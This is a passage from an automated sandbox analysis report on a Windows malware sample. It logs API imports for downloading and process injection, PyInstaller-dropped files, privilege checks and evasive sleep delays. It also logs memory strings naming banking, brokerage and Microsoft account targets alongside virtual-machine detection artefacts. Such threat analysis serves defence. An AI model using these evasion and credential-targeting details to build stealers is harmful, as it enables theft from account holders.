ILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNE
                    Source: 3Qv3xyyL5G.exe, svchost.exe, 65D35BAB97073674480464.exe, audiodg.exe, msiexec.exeBinary or memory string: IDAQ.EXE
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeMemory allocated: 1370000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeMemory allocated: 2DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeMemory allocated: 4DC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\explorer.exeCode function: 5_2_0B0A8660 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,5_2_0B0A8660
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 690Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4285Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4267Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 553Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 569Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 677Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 670Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWindow / User API: threadDelayed 3538Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWindow / User API: threadDelayed 6246Jump to behavior
                    Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-108664
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\_ctypes.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\_hashlib.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\_lzma.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\unicodedata.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\select.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\libcrypto-1_1.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\_bz2.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\python38.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\_socket.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI37682\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                    Source: C:\Windows\explorer.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-108358
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-17039
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-1135
                    Source: C:\Windows\System32\audiodg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_9-1131
                    Source: C:\Windows\System32\msiexec.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-1145
                    Source: C:\Windows\System32\svchost.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-1132
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-1184
                    Source: C:\Windows\explorer.exeAPI coverage: 5.9 %
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeAPI coverage: 1.8 %
                    Source: C:\Windows\System32\audiodg.exe TID: 5520Thread sleep time: -50000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 5520Thread sleep count: 280 > 30Jump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 5520Thread sleep time: -14000000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 1212Thread sleep count: 72 > 30Jump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 1212Thread sleep time: -194400s >= -30000sJump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 608Thread sleep count: 311 > 30Jump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 608Thread sleep time: -1866000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\audiodg.exe TID: 5520Thread sleep time: -50000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 5308Thread sleep count: 296 > 30Jump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 5308Thread sleep time: -14800000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 3068Thread sleep count: 690 > 30Jump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 3068Thread sleep time: -4140000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\svchost.exe TID: 5308Thread sleep time: -50000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 3424Thread sleep time: -50000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 3424Thread sleep count: 243 > 30Jump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 3424Thread sleep time: -12150000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 332Thread sleep count: 66 > 30Jump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 332Thread sleep time: -178200s >= -30000sJump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 3904Thread sleep count: 294 > 30Jump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 3904Thread sleep time: -1764000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\msiexec.exe TID: 3424Thread sleep time: -50000s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 4040Thread sleep time: -4070750s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 2060Thread sleep time: -4053650s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 6160Thread sleep time: -87400s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 432Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 4040Thread sleep time: -525350s >= -30000sJump to behavior
                    Source: C:\Windows\explorer.exe TID: 2060Thread sleep time: -540550s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exe TID: 2296Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                    Source: C:\Windows\System32\audiodg.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\svchost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                    Source: C:\Windows\System32\msiexec.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF7293479B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,12_2_00007FF7293479B0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF7293485A0 FindFirstFileExW,FindClose,12_2_00007FF7293485A0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 12_2_00007FF729360B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_00007FF729360B84
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF7293485A0 FindFirstFileExW,FindClose,13_2_00007FF7293485A0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF7293479B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_00007FF7293479B0
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FF729360B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_00007FF729360B84
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABAC303C FindFirstFileExW,FindNextFileW,FindClose,13_2_00007FFBABAC303C
                    Source: C:\Users\user\AppData\Local\Temp\4F82.tmp.zx.exeCode function: 13_2_00007FFBABAC3280 FindFirstFileExW,FindNextFileW,FindClose,13_2_00007FFBABAC3280
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeCode function: 0_2_00007FF785311444 GetSystemInfo,0_2_00007FF785311444
                    Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
                    Source: C:\Windows\explorer.exeThread delayed: delay time: 90000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\25A2.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                    Source: explorer.exe, 00000005.00000003.2286895285.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                    Source: explorer.exe, 00000005.00000000.1530369230.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                    Source: explorer.exe, 00000005.00000002.2793022789.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284159201.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1535548358.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                    Source: explorer.exe, 00000005.00000003.2284159201.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                    Source: explorer.exe, 00000005.00000002.2793022789.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1535548358.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284159201.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1834821304.0000000006210000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: explorer.exe, 00000005.00000003.2286895285.0000000009289000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                    Source: explorer.exe, 00000005.00000002.2793022789.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1535548358.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284159201.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
                    Source: explorer.exe, 00000005.00000000.1530369230.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                    Source: explorer.exe, 00000005.00000003.2286895285.0000000009289000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                    Source: explorer.exe, 00000005.00000000.1530369230.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                    Source: explorer.exe, 00000005.00000003.2286895285.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                    Source: 25A2.tmp.ssg.exe, 00000006.00000002.1823760251.0000000003218000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                    Source: explorer.exe, 00000005.00000000.1530369230.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeAPI call chain: ExitProcess graph end nodegraph_0-924
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeAPI call chain: ExitProcess graph end nodegraph_0-921
                    Source: C:\Users\user\Desktop\3Qv3xyyL5G.exeAPI call chain: ExitProcess graph end nodegraph_0-925
                    Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-874
                    Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-871
                    Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-893
                    Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-883
                    Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_2-880
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeAPI call chain: ExitProcess graph end nodegraph_7-873
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeAPI call chain: ExitProcess graph end nodegraph_7-878
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeAPI call chain: ExitProcess graph end nodegraph_7-895
                    Source: C:\Users\user\AppData\Roaming\65D35BAB97073674480464\65D35BAB97073674480464.exeAPI call chain: ExitProcess graph end nodegraph_7-875
